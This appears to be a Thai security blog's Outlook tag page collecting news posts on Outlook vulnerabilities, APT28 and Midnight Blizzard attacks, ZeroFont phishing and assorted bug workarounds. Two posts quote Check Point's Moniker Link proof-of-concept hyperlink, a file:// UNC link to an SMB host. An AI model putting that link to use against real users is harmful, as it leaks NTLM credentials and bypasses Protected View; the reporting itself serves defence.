แสดงบทความที่มีป้ายกำกับ Outlook แสดงบทความทั้งหมด
แสดงบทความที่มีป้ายกำกับ Outlook แสดงบทความทั้งหมด

17/02/2568

ช่องโหว่ RCE ระดับ Critical ใน Microsoft Outlook กำลังถูกนำไปใช้ในการโจมตีจริง


    CISA แจ้งเตือนหน่วยงานรัฐบาลกลางของสหรัฐฯ เมื่อวันพฤหัสบดีให้รักษาความปลอดภัยในระบบ เพื่อป้องกันการโจมตีที่กำลังเกิดขึ้น ซึ่งมุ่งเป้าไปที่ช่องโหว่ระดับ Critical ใน Microsoft Outlook ที่สามารถทำให้เกิดการเรียกใช้โค้ดที่เป็นอันตรายจากระยะไกล (Remote Code Execution) ได้
ช่องโหว่ดังกล่าวถูกพบโดยนักวิจัยจาก Check Point 'Haifei Li' และมีหมายเลข CVE-2024-21413 เกิดจากการตรวจสอบข้อมูลอินพุตที่ไม่เหมาะสม เมื่อเปิดอีเมลที่มีลิงก์อันตราย โดยใช้เวอร์ชันของ Outlook ที่มีช่องโหว่
    ผู้ไม่หวังดีสามารถดำเนินการเรียกใช้โค้ดที่เป็นอันตรายจากระยะไกลได้ เนื่องจากช่องโหว่ดังกล่าวทำให้สามารถ bypass ฟีเจอร์ Protected View (ซึ่งควรจะบล็อกเนื้อหาที่เป็นอันตรายที่ฝังอยู่ในไฟล์ Office โดยการเปิดไฟล์เหล่านั้นในโหมด read-only) และเปิดไฟล์ Office ที่เป็นอันตรายในโหมด editing ได้
เมื่อ Microsoft ได้แก้ไขช่องโหว่ CVE-2024-21413 เมื่อช่วงหนึ่งปีก่อน ทาง Microsoft ได้เตือนว่า Preview Pane เป็นช่องทางการโจมตีที่สามารถทำให้การโจมตีสำเร็จได้ แม้จะเพียงแค่ preview เอกสาร Office ที่เป็นอันตรายก็ตาม
    ตามที่ Check Point อธิบาย ช่องโหว่ด้านความปลอดภัยนี้ (เรียกว่า Moniker Link) ช่วยให้ผู้ไม่หวังดี สามารถ bypass การป้องกันที่มีอยู่ใน Outlook สำหรับลิงก์ที่เป็นอันตรายที่ฝังอยู่ในอีเมล โดยใช้โปรโตคอล file:// และการเพิ่มเครื่องหมายอัศเจรีย์ "!" ใน URL ที่ชี้ไปยังเซิร์ฟเวอร์ที่ถูกควบคุมโดยผู้ไม่หวังดี
    เครื่องหมายอัศเจรีย์ "!" จะถูกเพิ่มหลังจากนามสกุลไฟล์ พร้อมกับข้อความแบบสุ่ม (ในตัวอย่างของ Check Point ใช้คำว่า "something") ดังที่แสดงด้านล่าง
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* 
    CVE-2024-21413 ส่งผลกระทบต่อผลิตภัณฑ์ Office หลายรายการ รวมถึง Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, และ Microsoft Office 2019 โดยการโจมตีที่สำเร็จจาก CVE-2024-21413 อาจส่งผลให้ข้อมูล NTLM credentials ถูกขโมย และการเรียกใช้โค้ดที่เป็นอันตรายผ่านเอกสาร Office
    ในวันพฤหัสบดีที่ผ่านมา (6 กุมภาพันธ์ 2025) CISA ได้เพิ่มช่องโหว่นี้ลงในแคตตาล็อก Known Exploited Vulnerabilities (KEV) โดยระบุว่าเป็นช่องโหว่ที่กำลังถูกใช้ในการโจมตีอย่างต่อเนื่อง ตามที่ได้รับคำสั่งจาก Binding Operational Directive (BOD) 22-01 หน่วยงานรัฐบาลกลางจะต้องรักษาความปลอดภัยเครือข่ายของตนภายในสามสัปดาห์ (ภายในวันที่ 27 กุมภาพันธ์ 2025)
    หน่วยงานความมั่นคงทางไซเบอร์เตือนว่า "ช่องโหว่ประเภทนี้เป็นช่องทางการโจมตีที่พบได้บ่อยสำหรับผู้ไม่หวังดีทางไซเบอร์ และก่อให้เกิดความเสี่ยงที่สำคัญต่อองค์กรของรัฐบาลกลาง"
    ขณะที่ CISA ให้ความสำคัญกับการแจ้งเตือนหน่วยงานรัฐบาลกลางเกี่ยวกับช่องโหว่ที่ควรอัปเดตโดยด่วน องค์กรเอกชนก็ควรจัดลำดับความสำคัญในการแก้ไขช่องโหว่เหล่านี้เพื่อป้องกันการโจมตีที่กำลังดำเนินอยู่

07/10/2567

Microsoft แก้ไขปัญหาการส่งอีเมลบน Outlook สำหรับผู้ใช้ที่มีโฟลเดอร์จำนวนมาก


Microsoft ได้แก้ไขปัญหาที่ส่งผลต่อผู้ใช้ Outlook for Microsoft 365 ที่ทำให้เกิดปัญหาในการส่งอีเมลสำหรับผู้ที่มีโฟลเดอร์ซ้อนกันมากเกินไป
Microsoft พบปัญหาดังกล่าวครั้งแรกในเดือนธันวาคม 2023 โดยปัญหาดังกล่าวเกี่ยวข้องกับ mailbox ที่มี shared folder มากกว่า 500 โฟลเดอร์ ซึ่งข้อจำกัดดังกล่าวได้ถูกยกเลิกไปในปี 2019 โดยยกเลิกข้อจำกัด 500 โฟลเดอร์ใน Outlook อย่างไรก็ตามเชื่อว่าปัญหาดังกล่าวยังส่งผลต่อผู้ใช้ที่มีโฟลเดอร์จำนวนใกล้เคียงกันในกล่องจดหมายหลักของตนด้วย
Microsoft ระบุว่า ผู้ใช้งานที่พยายามส่งอีเมลจาก Outlook desktop app อาจได้รับรายงานการแจ้งเตือน Non-Delivery Report (NDR) พร้อม error code 0x80040305
โดยผู้ใช้ที่ได้รับผลกระทบจะได้รับการแจ้งเตือนด้วยว่าอีเมลของตนส่งไปไม่ถึงผู้รับบางส่วน หรือทั้งหมด โดยข้อความ NDR จะแนะนำให้ส่งใหม่อีกครั้งในภายหลังหรือติดต่อ network administrator
Outlook Team ได้พัฒนาวิธีแก้ไขปัญหา ซึ่งจะเผยแพร่ในช่วงเดือนตุลาคม หรือในเดือนธันวาคม 2024
  • Beta Channel : เวอร์ชัน 2410 (Build 18127.15020) คาดว่าจะออกในช่วงต้นเดือนตุลาคม 2024
  • Current Channel Preview : เวอร์ชัน 2410 (Build 18129.20000) คาดว่าจะออกในวันที่ 9 ตุลาคม 2024
  • Current Channel : เวอร์ชัน 2410 (บิลด์ 20000) คาดว่าจะออกในวันที่ 29 ตุลาคม 2024
  • Monthly Enterprise Channel : เวอร์ชัน 2410 (บิลด์ 20000) คาดว่าจะออกในวันที่ 10 ธันวาคม 2024
  • แนวทางการแก้ไข
ในระหว่างที่รอการแก้ไข ทาง Microsoft ได้แนะนำแนวทางแก้ไขปัญหาชั่วคราว โดยกำหนดให้ลดจำนวนโฟลเดอร์ที่มีโฟลเดอร์ย่อยให้ต่ำกว่า 500 โฟลเดอร์ โดยตั้งเป้าไว้ที่ 450 โฟลเดอร์ที่ซ้อนกัน และอีกวิธี คือการยุบโฟลเดอร์กล่องจดหมายทั้งหมดแทนที่จะขยาย
ซึ่งหากไม่สามารถดำเนินการอย่างใดอย่างหนึ่งข้างต้นได้ ให้หลีกเลี่ยงการดำเนินการออนไลน์ใน Outlook การดำเนินการดังกล่าวรวมถึงการใช้ปุ่ม 'View on Server' และ ' Click here to view more on Microsoft Exchange' หรือการใช้ ' Include older results' เมื่อค้นหา รวมถึงหากใช้บริการเหล่านี้ควรรีสตาร์ท Outlook ทันทีเพื่อประสิทธิภาพในการใช้งาน
ในเดือนกันยายน 2024 Microsoft ได้แก้ไขช่องโหว่ที่ทำให้ Microsoft 365 apps เช่น Outlook, Word, Excel และ OneNote หยุดทำงานขณะพิมพ์ หรือตรวจสอบการสะกดข้อความ รวมถึงในเดือนสิงหาคม 2024 ได้แบ่งปันแนวทางแก้ปัญหาชั่วคราวสำหรับปัญหาการลงชื่อเข้าใช้ Gmail สำหรับผู้ใช้ Outlook แบบคลาสสิก และทำให้ Outlook หยุดทำงานหลังจากเปิดใช้งาน

17/05/2567

Microsoft เสนอวิธีแก้ไขชั่วคราว ปัญหาอีเมล การตอบกลับอีเมลที่เข้ารหัสของ Outlook

        ผู้ใช้งาน Microsoft 365 หลายคนประสบปัญหาไม่สามารถตอบกลับอีเมลที่เข้ารหัสลับโดยใช้ Outlook Desktop โดยปัญหานี้เกิดจากข้อบกพร่องที่ส่งผลกระทบต่อผู้ใช้บน Current Channel เวอร์ชัน 2402 (Build 17328.20142) และสูงกว่าเท่านั้น โดยข้อผิดพลาดดังกล่าวจะแสดงข้อความ “Microsoft Outlook was not able to create a message with restricted permission” โดยเบื้องต้นมีวิธีการแก้ไขปัญหาชั่วคราวที่ถูกนำเสนอผ่าน Microsoft ดังนี้




วิธีแก้ไขชั่วคราว

        แม้ว่าไมโครซอฟท์จะยังไม่มีการแก้ไขถาวร แต่ผู้ใช้งานสามารถใช้วิธีแก้ไขชั่วคราวดังต่อไปนี้:

        ใช้ Outlook ใหม่ ไมโครซอฟท์แนะนำให้ใช้ Outlook เวอร์ชันใหม่ซึ่งไม่ได้รับผลกระทบจากปัญหานี้

        ใช้ Outlook Web Access (OWA) ผู้ใช้งานสามารถเข้าถึง OWA ผ่านเว็บเบราว์เซอร์เพื่อตอบกลับอีเมลที่เข้ารหัส

        ย้อนกลับไปใช้งาน Outlook Desktop เวอร์ชันเก่า ผู้ใช้งานสามารถถอนการติดตั้ง Outlook Desktop เวอร์ชันปัจจุบันและติดตั้งเวอร์ชันเก่าได้

        โดยหลังจากพบการแจ้งปัญหาผ่านเว็บไซต์ชุมชนของไมโครซอฟท์กำลังเร่งแก้ไขปัญหานี้ ผู้ใช้งานสามารถใช้วิธีแก้ไขชั่วคราวที่แนะนำข้างต้นได้ในระหว่างรอการแก้ไขถาวร

 

Ref : BleepingComputer

15/02/2567

ช่องโหว่ RCE บน Microsoft Outlook กำลังถูกใช้เป็นช่องทางการโจมตี


    Microsoft กล่าวว่าผู้โจมตีที่ไม่ได้รับการรับรองจากระยะไกลสามารถใช้ประโยชน์จากช่องโหว่ด้านความปลอดภัยของ Outlook ที่สำคัญได้เล็กน้อย ซึ่งทำให้พวกเขาข้ามผ่าน Office Protected View อยู่ในขณะนี้
ผู้เชี่ยวชาญด้านความปลอดภัยของ Check Point ถูกติดตามโดยเลข CVE-2024-21413 เป็นช่องโหว่ที่ผู้ไม่ประสงค์ดีสามารถเรียกใช้การโจมตีได้จากระยะไกล (RCE) โดยลิงก์นั้นถูกส่งมาโดยใช้ MS Outlook เวอร์ชั่นที่มีช่องโหว่
    เมื่อเป้าหมายได้รับ และกดเข้าไปในลิงก์ที่แนบมา เนื่องจากใช้งาน Outlook ที่มีช่องโหว่อยู่ทำให้การส่งอีเมลนั้น สามารถหลบเลี่ยงการตรวจสอบความปลอดภัยได้
   ผู้เชี่ยวชาญด้านความปลอดภัย ยังออกมาเจือนเพิ่มเติมอีกว่า Preview Pane เป็นเวคเตอร์การโจมตีสำหรับข้อบกพร่องด้านความปลอดภัยนี้ ช่วยให้สามารถใช้ประโยชน์ได้สำเร็จแม้ว่าจะดูตัวอย่างเอกสาร Office ที่ออกแบบมาเพื่อประสงค์ร้ายก็ตาม ผู้ไม่ประสงค์ดีอาจจะใช้สิทธิ์ระดับสูง ซึ่งจะสามารถ อ่าน เขียน ลบแก้ไขไฟล์ได้ด้วย
    CVE-2024-21413 เป็นช่องโหว่ที่มีผลกระทบกับผลิตภัณฑ์ของ MS Office หลายรายการ รวมไปถึง Microsoft Office LTSC 2021 และ Microsoft 365 Apps for Enterprise รวมถึง Microsoft Outlook 2016 และ Microsoft Office 2019

การใช้เครื่องหมาย "ฟันหนู" เพื่อหลบเลี่ยงการตรวจสบความถูกต้อง
    จากการตรวจสอบของ Check Point ช่องโหว่ที่ถูกเรียกว่า Moniker Link ช่วยให้ผู้โจมตีสามารถหลบเลี่ยงการตรวจสอบความถูกต้องของ Outlook โดยลิงค์จะอยู่ในอีเมล ถูกซ่อนใว้ด้วยเครื่องหมาย ฟันหนู ที่ถูกชี้ไปยังผู้โจมตี เซิร์ฟเวอร์ ดังตัวอย่างด้านล่างนี้ 
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
 ไฮเปอร์ลิงก์นี้จะข้ามข้อจำกัดด้านความปลอดภัยของ Outlook และจะเข้าถึงทรัพยากรระยะไกล "\\10.10.111.111\test\test.rtf" เมื่อมีการคลิกลิงก์โดยไม่แสดงคำเตือนหรือข้อผิดพลาดใด ๆ
ข้อบกพร่องดังกล่าวเกิดขึ้นเนื่องจาก API ที่ไม่ปลอดภัยของ MkParseDisplayName ดังนั้นช่องโหว่อาจส่งผลกระทบต่อซอฟต์แวร์อื่น ๆ ที่ใช้งานด้วย

   ผลกระทบของการโจมตีที่ประสบความสำเร็จในการใช้ประโยชน์จาก CVE-2024-21413 รวมถึงการขโมยข้อมูลประจำตัว NTLM การใช้รหัสโดยอำเภอใจผ่านเอกสาร Office ที่ออกแบบมาเพื่อทำการโจมตีเป้าหมาย
    โดยที่การโจมตีนี้จะเกิดขึ้นบนผู้ใช้งาน OS Windows 10 และ 11 บนผลิตภัณฑ์ MS365 (Office 2021) ส่วน OS และ ผลิตภัณฑ์อื่น ๆ กีอาจจะโดนโจมตีด้วยเช่นกัน ราเชื่อว่านี่เป็นปัญหาที่ถูกมองข้ามซึ่งมีอยู่ในระบบนิเวศของ Windows/COM มานานหลายทศวรรษ เนื่องจากมันอยู่ในแกนหลักของ COM API ขอแนะนำอย่างยิ่งให้ผู้ใช้ Outlook ทุกคน ให้ทำการ Update Patch อย่างโดยเร็วที่สุด

06/02/2567

Microsoft Outlook อัปเดตความปลอดภัย iCalendar (ICS) เดือนธันวาคม

 

       Microsoft กำลังตรวจสอบปัญหาที่ทำให้เกิดการแจ้งเตือนความปลอดภัยของ Outlook เมื่อพยายามเปิดปฏิทิน iCalendar (ICS) หลังจากติดตั้งอัปเดตความปลอดภัยของ Office Patch Tuesday เดือนธันวาคม 2023

         Microsoft 365 ผลกระทบจากผู้ใช้งาน ที่เกิดปัญหา จะพบแจ้งเตือนว่า Microsoft Office has identified a potential security concern และ This location may be unsafe เมื่อเปิดไฟล์ iCalendar (ICS)  ที่บันทึกไว้ในเครื่อง

        Microsoft ประกาศ แจ้งให้ผู้ใช้งานทราบว่า คาดการณ์ว่าจากปัญหาเปิดไฟล์ iCalendar (ICS) จะถูกทำการแก้ไขปัญหาในการอัปเดต patchs ถัดไป

      Microsoft ประกาศให้ทราบว่าจะพบแจ้งเตือนว่าขึ้นหลังจากปรับ security patches ที่แก้ไขช่องโหว่การเปิดเผยข้อมูล CVE-2023-35636 Microsoft Outlook

        หากผู้ใช้งานไม่อัปเดต security patches ใหม่ ผู้ไม่ประสงค์ดีจะทำการหลอกให้ผู้ใช้งานติดตั้ง outlook ที่ไม่สามารถอัปเดต security patches เพื่อป้องกันการขโมย NTLM (Format ของการเก็บ password ใน Window)

         ผู้ไม่ประสงค์ดีสามารถใช้ข้อมูลจากผู้ใช้งานในการเข้าถึงข้อมูลที่ละเอียดอ่อน หรือเจาะระบบเครือข่ายด้านข้างได้ในภายหลัง


 

วิธีการแก้ไขชั่วคราว

        ที่ใช้ได้สำหรับผู้ที่ได้รับผลกระทบจากปัญหานี้แล้ว Microsoft ได้ให้คำแนะนำวิธีการแก้ไขชั่วคราวในแบบ ปิดการแสดงการแจ้งเตือนความปลอดภัย ของ registry key การแก้ไขจะส่งผลให้ไม่ได้รับการแจ้งเตือนอื่น ๆ ที่เกี่ยวกับความปลอดภัยอื่นด้วย

          วิธีการแก้ไขนี้ ผู้ใช้งานจะต้องทำการสร้างคีย์ DWORD ใหม่กำหนดค่าเป็น '1' ไปที่อยู่ของ registry key ต่อไปนี้:

            Group Policy registry path (HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security)

            OCT registry path (Computer\HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security)



Ref : bleepingcomputer

02/02/2567

Microsoft แก้ไขปัญหาที่เกิดขึ้นบน ผลิดภัณฑ์ที่เกี่ยวกับ E-Mail Outlook


    ไมโครซอฟท์ได้แก้ปัญหาที่เกิดขึ้น ที่เกิดจากโปรแกรมอีเมลบนเดสก์ท็อป และมือถือที่ล้มเหลวในการเชื่อมต่อเมื่อใช้บัญชี Outlook.com ได้ดำเนินการเปลี่ยนแปลงบริการในวันที่ 31 มกราคม 2024 เพื่อแก้ไขปัญหาการเชื่อมต่อที่มีปัญหาด้านการพิสูจน์ตัวตนที่ไม่ถูกต้องและสามารถหลีกเลี่ยงการตรวจสอบได้
    สำหรับ Outlook 2013 และ 2016 หากคุณยังเห็นการแจ้งขอการพิสูจน์ตัวตน โปรดตรวจสอบให้แน่ใจว่าคุณได้เปิดใช้งานการตรวจสอบสองขั้นตอน (MFA) หรือไม่ และทำการสร้างรหัสผ่านสำหรับแอปโดยเฉพาะ แทนรหัสที่ท่านใช้งานทั่ว ๆ ไปหรือเหมือนกันในหลาย ๆ แอป
    รายละเอียดเพิ่มเติมเกี่ยวกับวิธีใช้รหัสผ่านแอป กับแอปที่ไม่รองรับการตรวจสอบสองขั้นตอน สามารถพบได้ในเอกสารสนับสนุนนี้ 
ผู้ใช้งาน Outlook ที่ได้รับผลกระทบจากปัญหาดังกล่าว ได้เริ่มแชร์รายงานความผิดปกตินี้ไปยังแพลตฟอร์มชุมชน ของไมโครซอฟท์ และโซเชียลเน็ตเวิร์กอื่น ๆ เช่น Reddit ตั้งแต่วันอังคารที่ผ่านมา
    วิธีการสังเกตุ ผู้ใช้งานที่ได้รับผลกระทบจะมีการแจ้งเตือนป๊อปอัพที่ต้องการให้พิมพ์รหัสผ่านของบัญชีของพวกเขา และมีตัวเลือกให้ จดจำข้อมูลการเข้าสู่ระบบของผู้ใช้งาน Credential แม้ให้พวกเขากรอกรหัสผ่านที่ถูกต้อง หน้าต่างเข้าสู่ระบบก็ยังจะป๊อปอัพขึ้น เมื่อแอปพยายามเชื่อมต่อกับบัญชี Outlook.com
    ปัญหาเกิดขึ้นครั้งแรกเมื่อ 23/1/24 ผู้ใช้งานรายงานว่ามีปัญหาในการเชื่อมต่อ Outlook 2013, Outlook 2016, Outlook for Microsoft 365, Thunderbird, และแอปบนมือถือ เมื่อเชื่อมต่อด้วยวิธีการ POP, IMAP, และ Exchange บางผู้ใช้งานได้รายงานว่าการเข้าสู่ระบบด้วยรหัสผ่านแอปเชื่อมต่อใช้งานได้ แต่ในภายหลังกลับไปอยู่ในสถานะที่ยังไม่ได้เชื่อมต่อการใช้งาน

การแก้ปัญหาสำหรับปัญหา Outlook อื่น ๆ
    ผู้ใช้งาน Outlook.com ประสบปัญหาอื่นๆ ในช่วงไม่กี่เดือนที่ผ่านมา ซึ่งผู้ใช้งานไม่สามารถค้นหาเนื้อหาอีเมล ทำให้อีเมลของผู้ใช้งานค้นหาอีเมลล้มเหลว
    สองเดือนที่ผ่านมา ทีม Outlook ได้แก้ไขปัญหาอื่น ๆ ซึ่งทำให้ Outlook บนเดสก์ท็อปไม่สามารถใช้งานได้ ขณะที่ทำการส่งอีเมลจากบัญชี Outlook.com ในเวอร์ชัน 2311 Build 17029.20068
    หลังจากแก้ไขปัญหาแล้ว ไมโครซอฟท์แนะนำให้ผู้ใช้งานที่ปิดการอัปเดตอัตโนมัติคลิก
Update Now > under File > Office Account > Update Options to get the fix.

08/12/2566

กลุ่ม APT28 ใช้ช่องโหว่ใน Outlook เพื่อขโมยบัญชี Microsoft Exchange


    Threat Intelligence ของ Microsoft ออกคำเตือนเมื่อวันที่ 4 ธันวาคม 2023 ที่ผ่านมา จากการพบกลุ่ม ผู้ไม่ประสงค์ดีที่ได้รับการสนับสนุนจากรัฐบาลรัสเซียในชื่อ APT28 ("Fancybear" หรือ "Strontium") ที่ได้ทำการโจมตีเป้าหมายโดยใช้ช่องโหว่ Outlook CVE-2023-23397 เพื่อขโมยบัญชี Microsoft Exchange และข้อมูลที่มีความสำคัญ โดยหน่วยงานที่ตกเป็นเป้าหมายในการโจมตีได้แก่ หน่วยงานรัฐบาล, หน่วยงานทางด้านพลังงาน, การขนส่ง และองค์กรสำคัญอื่น ๆ ในสหรัฐอเมริกา ยุโรป และตะวันออกกลาง รวมถึง Microsoft ยังพบการใช้ช่องโหว่อื่น ๆ ในการโจมตีด้วย เช่น CVE-2023-38831 ใน WinRAR และ CVE-2021-40444 ใน Windows MSHTML

การโจมตีช่องโหว่ Outlook
    CVE-2023-23397 (คะแนน CVSS 9.8/10 ความรุนแรงระดับ Critical) เป็นช่องโหว่การยกระดับสิทธิ์ Elevation of Privilege (EoP) ใน Outlook บน Windows ซึ่ง Microsoft ได้แก้ไขช่องโหว่ดังกล่าวแล้วใน Patch Tuesday เดือนมีนาคม 2023
    การโจมตีโดยใช้ช่องโหว่ Outlook ของกลุ่ม APT28 เริ่มขึ้นตั้งแต่เดือนเมษายน 2022 ผ่าน Outlook notes ที่สร้างขึ้นเป็นพิเศษซึ่งออกแบบมาเพื่อขโมย NTLM hashes โดยบังคับให้อุปกรณ์เป้าหมายตรวจสอบสิทธิ์การแชร์ SMB ที่ ผู้ไม่ประสงค์ดีควบคุม โดยไม่จำเป็นต้องมีการโต้ตอบจากผู้ใช้ หลังจากนั้นก็จะทำการแพร่กระจายไปในระบบของเป้าหมาย (lateral movement) และเปลี่ยนสิทธิ์กล่องจดหมายบน Outlook เพื่อดำเนินการขโมยอีเมลแบบกำหนดเป้าหมาย
    ถึงแม้ว่าจะมีการออกแพตซ์อัปเดตด้านความปลอดภัย และคำแนะนำในการป้องกัน แต่ช่องทางในการโจมตียังคงมีความอันตราย รวมถึงช่องโหว่ bypass of the fix (CVE-2023-29324) ที่ถูกเผยแพร่ในเดือนพฤษภาคม 2023 ก็ทำให้มีความเสี่ยงในการโจมตีเพิ่มยิ่งขึ้น
    Recorded Future ได้แจ้งเตือนในเดือนมิถุนายน 2023 ที่ผ่านมา จากการพบกลุ่ม APT28 ได้ใช้ช่องโหว่ของ Outlook ในการโจมตีไปยังองค์กรสำคัญของยูเครนในเดือนตุลาคม 2022 และหน่วยงานรักษาความปลอดภัยทางไซเบอร์ของฝรั่งเศส (ANSSI) ได้เปิดเผยว่ากลุ่ม APT28 ได้ใช้ช่องโหว่ Zero-Day ในการโจมตีหน่วยงานภาครัฐ, ธุรกิจ, มหาวิทยาลัย, สถาบันวิจัย และสถาบันวิจัยในฝรั่งเศส

คำแนะนำในการป้องกันตามลำดับความสำคัญ มีดังนี้ :
  • อัปเดตแพตซ์ความปลอดภัยสำหรับช่องโหว่ CVE-2023-23397 และ CVE-2023-29324
  • ใช้ script จาก Microsoft เพื่อตรวจสอบว่ามีการกำหนดเป้าหมายการโจมตีไปยังผู้ใช้ Exchange หรือไม่
  • รีเซ็ตรหัสผ่านของผู้ใช้ที่ถูกโจมตี และเปิดใช้งาน MFA (multi-factor authentication) สำหรับผู้ใช้ทั้งหมด
  • จำกัดการรับส่งข้อมูลผ่าน SMB โดยการบล็อกการเชื่อมต่อไปยังพอร์ต 135 และ 445 จากที่อยู่ IP ขาเข้าทั้งหมด
  • ปิดการใช้งาน NTLM บนระบบ
    เนื่องจากกลุ่ม APT28 เป็นกลุ่ม ผู้ไม่ประสงค์ดีที่มีความสามารถสูง และสามารถปรับรูปแบบการโจมตีได้ตลอดเวลา วิธีการป้องกันการโจมตีที่ดีที่สุดคือการลดพื้นที่ที่มีความเสี่ยงในการถูกโจมตีให้ได้มากที่สุด รวมถึงหมั่นตรวจสอบซอฟต์แวร์ทั้งหมดในระบบ ว่าได้รับการอัปเดตอย่างสม่ำเสมอหรือไม่

27/09/2566

ZeroFont เมล์ Phishing ใหม่ด้วยการหลอกว่าเป็นการแจ้งเตือนจาก Antivirus(ปลอม)


    ผู้ไม่ประสงค์ดี เปลี่ยนรูปแบบของฟิชชิ่งรูปแบบใหม่มาใช้ในการโจมตีด้วยการใช้ ZeroFont เพื่อทำให้อีเมลดังกล่าวนั้นถูกแสดงเป็นอันตรายต่อระบบ และเมื่อถูกตรวจสอบความปลอดภัยทำให้ถูกตรวจพบเป็น Virus บน MS outlook ถึงแม้ว่าการใช้ ZeroFont จะเคยถูกใช้มาแล้วในอดีต แต่ถือว่านี้เป็นครั้งแรกที่มันปรากฏขึ้นและถูกตรวจจับได้
ZeroFont
   ถูกพบครั้งแรกเมื่อปี 2561 เป็นเทคนิคหนึ่งในการแทรกคำหรืออักขระที่ซ่อนอยู่ในอีเมลโดยการตั้งค่าขนาดตัวอักษรเป็นศูนย์ แสดงผลข้อความที่มนุษย์ไม่สามารถมองเห็นได้ แต่สามารถอ่านได้ด้วย NLP การโจมตีนี้มีจุดมุ่งหมายเพื่อหลีกเลี่ยงตัวกรองความปลอดภัยโดยการแทรกคำที่ไม่เป็นอันตรายซึ่งมองไม่เห็นซึ่งผสมกับเนื้อหาที่มองเห็นได้ที่น่าสงสัย บิดเบือนการตีความเนื้อหาโดย AI และผลลัพธ์ของการตรวจสอบความปลอดภัย
ซ่อนกระบวนการสแกนไวรัสหลอก ๆ
    จากการที่มีผู้ได้รับอีเมลแบบฟิชชิ่งที่ใช้การ โจมตีแบบ ZeroFont และใช้ MS Outlooks เป็นตัวกลางในการส่งออกและด้วยการผาดหัวอีเมลว่า ได้รับการสแกนความปลอดภัยโดย Isc Advanced Threat Protection และในส่วนของ หัวขอ อีเมล จะเป็นลักษณะของการเสนอตำแหน่งงานให้


    โดยการใช้ประโยชน์จาก ZeroFont เพื่อซ่อนข้อความสแกนความปลอดภัยปลอมที่ตอนต้นของอีเมลฟิชชิ่ง ดังนั้นแม้ว่าผู้รับจะมองไม่เห็น แต่ Outlook ก็ยังคงดึงข้อความนั้นมาและแสดงเป็นตัวอย่างในบานหน้าต่างรายการอีเมล


27/06/2566

Microsoft แจ้งเตือนถึง USER ในการถูกผู้ไม่ประสงค์ดีขโมยข้อมูลแบบ Credential Stealing Attacks


    ทาง Microsoft ได้ออกมาเปิดเผยยอดของการโจมตีแบบ Credential Stealing Attacks ที่สูงมากขึ้น จากกลุ่มผู้ไม่ประสงค์ดีชาวรัสเซียโดยมีชื่อกลุ่มว่า Midnight Blizzard
    โดยที่การโจมตีอาศัยการใช้งาน IP Address แบบ Public ในการโจมตีแต่ละครั้งทำให้ทีมของผู้ตรวจสอบไม่สามารถระบุได้ว่าผู้ไม่ประสงค์ดีโจมตีจากจุดไหน โดยการโจมตีจะกำหนดเป้าหมาย เป็นกลุ่มของ กระทรวงการต่างประเทศ และ หน่วยงานทางการฑูต โดยที่กลุ่มนี้ มีอีกชื่อหนึ่งว่า APT29 ซึ่งเป็นกลุ่มที่ถูกกล่าวว่าน่ากลัวที่สุดใน กลุ่มของ ผู้ไม่ประสงค์ดีอีกหลาย ๆ กลุ่ม
    การโจมตี อาศัยช่องโหว่ของ การใช้งาน E-mail ที่มี File แนบโดยที่มีเลข  CVE-2020-12641 , CVE-2020-35730และCVE-2021-44026


    และเมื่อทำการโจมตีสำเร็จทำให้ผู้ไม่ประสงค์ดีสามารถเปลี่ยนเส้นทางอีเมล์ขาเข้าของเป้าหมายไปยังที่อยู่ภายใต้การควบคุมของทางผู้ไม่ประสงค์ดีแทน ทาง Microsoft ยังกล่าวอีกว่า การโจมตีรูปแบบนี้ยังเกี่ยวข้องกับการโจมตีแบบ Zero-Day ใน MS outlook CVE-2023-23397 ที่ Microsoft เป็นการโจมตีแบบกำหนดเป้าหมาย ทำให้ทาง Microsoft ได้รู้ถึงความพยายามของผู้ไม่ประสงค์ดีในการโจมตีที่มีความเกี่ยวข้องกับความขัดแย้งของระหว่างประเทศ ที่หันมาใช้การโจมตีทางไซเบอร์ที่แพร่ไปทั่วโลก

16/05/2566

Microsoft ออกแพตซ์กอัปเดต เพื่อแก้ไขปัญหาการ bypass หลังการอัปเดตช่องโหว่ Outlook zero-click [EndUser]


Microsoft ออกแพตซ์อัปเดตเพื่อแก้ไขช่องโหว่ด้านความปลอดภัย Outlook zero-click เพิ่มเติม เนื่องจากพบว่า Hacker สามารถ bypass แพตซ์อัปเดตของช่องโหว่ Microsoft Outlook Elevation of Privilege Vulnerability (CVE-2023-23397) ได้
โดยช่องโหว่ zero-click bypass มีชื่อว่า Windows MSHTML Platform Security Feature Bypass Vulnerability หรือ CVE-2023-29324 (คะแนนCVSS 6.5/10 ระดับความรุนแรงปานกลาง) โดยส่งผลกระทบต่อ Outlook client ใน Windows รุ่นที่รองรับทั้งหมด
ก่อนหน้านี้ช่องโหว่ของ Microsoft Outlook Elevation of Privilege Vulnerability หรือ CVE-2023-23397 (คะแนนCVSS 9.8/10 ระดับความรุนแรง Critical) เป็นช่องโหว่ในการยกระดับสิทธิ์ใน Outlook client สำหรับ Windows ที่ทำให้ Hacker สามารถขโมย NTLM Hash โดยที่ผู้ใช้ไม่ต้องโต้ตอบใด ๆ เพื่อนำไปใช้ในการโจมตีแบบ NTLM-relay attack ได้
โดย Hacker จะส่งข้อความแบบ MAPI properties ที่มี UNC paths ที่ถูกกำหนดค่าไว้ ทำให้ Outlook client เชื่อมต่อกลับไปยัง SMB shares ที่อยู่ภายใต้การควบคุมของ Hacker ได้
ช่องโหว่ดังกล่าวได้ถูกแก้ไขไปแล้วในเดือนมีนาคม 2023 ซึ่งทาง Microsoft ได้แก้ไขปัญหาด้วยการรวมการเรียก MapUrlToZone เพื่อให้แน่ใจว่า UNC paths ไม่เชื่อมต่อกับ URL อินเทอร์เน็ต รวมถึงแทนที่ notification sound ด้วยค่าเริ่มต้น


ช่องโหว่ถูกใช้โดยกลุ่ม Hacker ชาวรัสเซียเพื่อขโมยข้อมูล
